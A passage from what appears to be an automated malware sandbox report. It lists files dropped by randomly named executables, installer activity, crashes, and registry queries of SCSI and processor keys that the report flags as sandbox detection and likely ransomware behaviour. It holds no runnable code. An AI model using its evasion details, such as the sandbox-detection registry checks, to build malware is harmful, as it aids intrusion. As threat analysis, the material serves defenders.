(x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\connection.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe sItBlTP8i4E25HX__m218TGK.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\UltraMediaBurner\is-9VTQB.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe sItBlTP8i4E25HX__m218TGK.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe -
Drops file in Windows directory 23 IoCs
Processes:
msiexec.exeWerFault.exedescription ioc process File created C:\Windows\Installer\f757187.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8BAC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8DEF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E2E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8A61.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8B3D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF7908AF3FBEED2112.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\f757187.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI89F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDEBF.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF9D0F51E3925A5647.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI77D1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8ACF.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFA7D836FECFA304D7.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF594FE6162C43B850.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI8EEB.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSI916C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI942D.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1796 656 WerFault.exe VjGNJYTkssviPnxpDIwNcfng.exe 4716 1996 WerFault.exe mJimMqtn6WWB9vVWN43v00Qa.exe 1696 2812 WerFault.exe qTlcjPAmCYslnsQO0fRE5dYW.exe 1364 1608 WerFault.exe mvaT_YqO7KekkPxnX5BA4Fiz.exe 1980 840 WerFault.exe iRqjX4A5YnqgK2YsIoMgdSoD.exe 3988 1192 WerFault.exe 52gsIfQbxcku44ZeI8702OJN.exe 4436 1016 WerFault.exe c_VdWDUCwwtRatLZqa1msoRS.exe 1176 4276 WerFault.exe rundll32.exe 6056 4716 WerFault.exe runvd.exe 5940 4244 WerFault.exe rundll32.exe 5644 1072 WerFault.exe askinstall53.exe 5084 5744 WerFault.exe 6297292.exe 4712 5368 WerFault.exe 3924183.exe 4184 3932 WerFault.exe VC_redist.x64.exe 6908 6028 WerFault.exe VC_redist.x86.exe 4644 6740 WerFault.exe InstallShadowVPN.exe 6696 6740 WerFault.exe InstallShadowVPN.exe 5988 6748 WerFault.exe rundll32.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\1P2iyh2JidvGFh4oERonoUp_.exe nsis_installer_2 C:\Users\Admin\Documents\1P2iyh2JidvGFh4oERonoUp_.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exevssvc.exewtASthkTL07xVBxtjE9a02tm.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000312b64fa169c92a50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000400600000000ffffffff000000002700010000080000312b64fa00000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005006000000000000a0f93f000000ffffffff000000000701010000280300312b64fa00000000000050060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wtASthkTL07xVBxtjE9a02tm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried 